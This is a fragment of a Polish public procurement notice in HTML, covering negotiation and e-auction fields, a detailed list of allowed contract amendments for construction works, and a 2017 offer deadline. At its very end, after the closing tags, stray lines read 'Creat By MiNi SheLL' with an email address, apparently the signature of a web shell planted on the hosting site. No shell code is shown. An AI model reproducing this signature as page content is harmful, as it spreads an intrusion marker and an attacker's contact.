              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Niedopuszczalne są zmiany istotnych postanowień umowy w stosunku do treści oferty, 
           na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem takich zmian,  gdy 
           zajdzie co najmniej jedna z okoliczności przewidzianych w art. 144 ust 1 Ustawy z dnia 
          29.01.2004 r. Prawo Zamówień Publicznych.
1. Na podstawie art.144 ust.1 pkt. 1 ustawy zamawiający przewiduje następujące 
           możliwości   zmiany umowy:
  
     1.1 Zamawiający dopuszcza możliwość przedłużenia terminu realizacji wykonania 
             zamówienia w przypadku wystąpienia niezależnych od Wykonawcy okoliczności :
           a. w przypadku wystąpienia nieprzewidzianych robót nie objętych przedmiotem  
               zamówienia (robót dodatkowych), które są niezbędne do wykonania, a których 
               realizacja powoduje konieczność przedłużenia terminu umowy podstawowej,
          b.  w przypadku wystąpienia konieczności wykonania robót koniecznych lub  
               zamiennych,
          c. ujawnienia niezinwentaryzowanych lub o odmiennym przebiegu niezgodnym 
                z inwentaryzacją podziemnych sieci, instalacji lub urządzeń obcych i konieczności 
                wykonania robót związanych z ich zabezpieczeniem lub usunięciem kolizji, 
          d. w przypadku wystąpienia niekorzystnych warunków atmosferycznych, nie 
                pozwalających na prowadzenie prac oraz uniemożliwiających zapewnienie 
                odpowiedniej jakości wykonywanych robót, tj.: ciągłe opady atmosferyczne (trwające 
                powyżej 7 dni).
  1.2. W przypadku zaistnienia w/w okoliczności Zamawiający może przedłużyć termin 
           zakończenia wykonania zamówienia na pisemny, szczegółowo uzasadniony wniosek 
           Wykonawcy zaopiniowany przez osobę nadzorująca ze strony zamawiającego . Okres 
           przedłużenia  terminu nie może być dłuższy niż czas trwania tych okoliczności.

2. Zmiana osoby na  stanowisku kierownika budowy, kierownika robót drogowych pod warunkiem, że wskazana   osoba spełniać będzie wymagania określone w specyfikacji istotnych warunków   zamówienia.  
       
3. Zmiana wynagrodzenia w związku z rozliczeniem wykonanych robót kosztorysem 
         powykonawczym, oraz w przypadku zmiany umowy na podstawie art. 144 ust.1, 
         pkt 2,3,6.

4. Zmiana wynagrodzenia będąca konsekwencją wykonania robót koniecznych, 
          zamiennych oraz robot zaniechanych.

5. Zmiany wynagrodzenia za wykonanie zamówienia w przypadku  konieczności 
        dokonania zmian, aktualizacji, korekt w dokumentacji projektowej  mających 
         bezpośredni wpływ na wysokość wynagrodzenia; 

6.  W przypadku, gdy oferta Wykonawcy realizującego  usługi nie zawierała  wskazania 
          części,  którą na etapie realizacji zamówienia zamierza on powierzyć podwykonawcy, 
          Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści  
          oferty, na  podstawie której dokonano wyboru Wykonawcy, tj. powierzenia części 
           zamówienia do  realizacji przez podwykonawców.

 7 . Zamawiający dopuszcza rezygnację z podwykonawcy  lub zmianę podwykonawcy. 
            W przypadku zmiany lub rezygnacji z podwykonawcy,  na którego zasoby 
            wykonawca powoływał się w celu wykazania spełniania warunków udziału 
            w postępowaniu  Wykonawca jest zobowiązany do wykazania zamawiającemu, że 
            proponowany inny   podwykonawca lub wykonawca samodzielnie spełnia warunki 
            udziału w postępowaniu w stopniu nie mniejszym niż podwykonawca na którego zasoby 
            Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.              
8.   Oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy;
9.  Zmiana osoby odpowiedzialnej za realizację zamówienia ze strony Zamawiającego.
10  Zmiany niezbędne do prawidłowej realizacji zamówienia związane z:
           - koniecznością zapewnienia bezpieczeństwa lub zapobieżenie awarii,
           - koniecznością spowodowana zmianą obowiązujących przepisów prawa powodującą, że 
             realizacja przedmiotu umowy w niezmienionej postaci stanie się niecelowa, 
           - okoliczności powodujące, że przedmiot umowy nie może zostać zrealizowany zgodnie z 
             zasadami sztuki inżynierskiej, 
           - gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy 
             okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi 
             odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, 
             zgodnie ze Specyfikacją Istotnych Warunków Zamówienia  - Zamawiający dopuszcza 
             możliwość zmiany umowy, w szczególności terminu realizacji zamówienia;    
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 27/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com